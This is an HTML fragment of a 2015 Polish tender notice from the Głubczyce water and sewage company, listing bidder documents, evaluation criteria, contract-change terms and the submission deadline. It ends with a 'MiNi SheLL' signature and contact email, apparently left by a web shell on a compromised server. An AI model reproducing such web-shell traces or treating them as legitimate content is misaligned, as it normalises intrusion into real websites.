<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawca przedkłada oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2. Wykonawca powinien dostarczyć aktualne pełnomocnictwo udzielone osobie podpisującej dokumenty ofertowe, o ile jej prawo do reprezentowania Wykonawcy w powyższym zakresie nie wynika wprost z dokumentu rejestrowego.
3. W przypadku konsorcjum każdy uczestnik musi wykazać spełnienie warunku o nie podleganiu wykluczeniu z postępowania o udzielenie zamówienia i złożyć dokumenty wymienione w pkt. 2. 
4. Wypełniony druk oferta, stanowiący załącznik nr 1 do niniejszej specyfikacji.
5. Parafowany projekt umowy jako akceptacja jej treści i warunków (na formularzu            stanowiącym   załącznik nr 7 do SIWZ).
6. Oświadczenie Wykonawcy, że  powziął wszelkie informacje, które mogą być konieczne do   wykonania zamówienia.  
7. W przypadku wnoszenia oferty przez Wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, dokumenty należy złożyć na zasadach określonych w Rozporządzeniu Prezesa Rady Ministrów z dnia 19 lutego 2013 roku  sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz    form w jakich te dokumenty mogą być składane (Dz.U. 2012.1271).  
8. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku oświadczenia i dokumenty wymienione w pkt. 1 składa każdy z Wykonawców występujących wspólnie, pozostałe dokumenty Wykonawcy składają wspólnie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zgodnie z art. 144 ustawy PZP Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku:
a)	działania siły wyższej, mającej bezpośredni wpływ na termin wykonania robót będących przedmiotem nadzoru (np. klęski żywiołowe, zdarzenia losowe, katastrofy, strajki generalne lub lokalne i inne).
b)	zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, w tym zmiany stawek podatku VAT.
c)	wydłużenia się realizacji procedur administracyjnych związanych z przedmiotem zamówienia (np. uzgodnienia, decyzje) niezawinionych przez Wykonawcę. 
d)	postępu technicznego.
e)	wykonania uzupełniających analiz, opracowań. 
f)	w przypadku niekorzystnych warunków atmosferycznych, które uniemożliwią realizowanie przedmiotu zamówienia zgodnie z warunkami określonymi dokumentacji. Zmiana terminu skutkuje przedłużeniem o okres przestoju.
2. Wskazane powyżej zmiany mogą zostać wprowadzone, jedynie w przypadku jeżeli obydwie strony umowy zgodnie uznają, że zaszły wskazane okoliczności oraz wprowadzenie zmian jest konieczne dla prawidłowej realizacji zamówienia.
3. Zamawiający wymaga, aby wybrany Wykonawca zawarł z nim umowę na warunkach określonych we wzorze umowy stanowiącym załącznik nr 7 do specyfikacji, będącym jej integralną częścią. Parafowany projekt umowy  należy dołączyć do oferty.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wodociagi-glubczyce.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Powstańców 2 48-100 Głubczyce.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.09.2015 godzina 12:30, miejsce: Głubczyckie Wodociągi i Kanalizacja Sp. z o.o. ul. Powstańców 2 48-100 Głubczyce.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com